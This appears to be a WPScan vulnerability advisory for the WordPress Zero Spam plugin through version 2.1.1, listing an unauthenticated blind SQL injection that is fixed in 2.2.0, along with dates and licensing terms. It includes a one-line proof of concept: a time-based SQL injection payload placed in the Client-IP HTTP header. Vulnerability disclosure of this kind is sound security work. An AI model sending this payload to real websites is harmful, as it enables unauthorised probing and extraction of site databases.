WordPress Zero Spam <= 2.1.1 - Unauthenticated Blind SQL InjectionSign up to our free email alerts service for instant vulnerability notifications!
|Proof of Concept||
HTTP request header: Client-IP: '+(select(0)from(select(sleep(10)))v)+'
fixed in version 2.2.0
|OWASP Top 10||A1: Injection|
|Publicly Published||2016-08-24 (9 months ago)|
|Added||2016-08-24 (9 months ago)|
|Last Updated||2016-11-24 (6 months ago)|
Copyright & License
|Copyright||All data and resources contained within this page and this web site is Copyright © The WPScan Team.|
|License||Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.|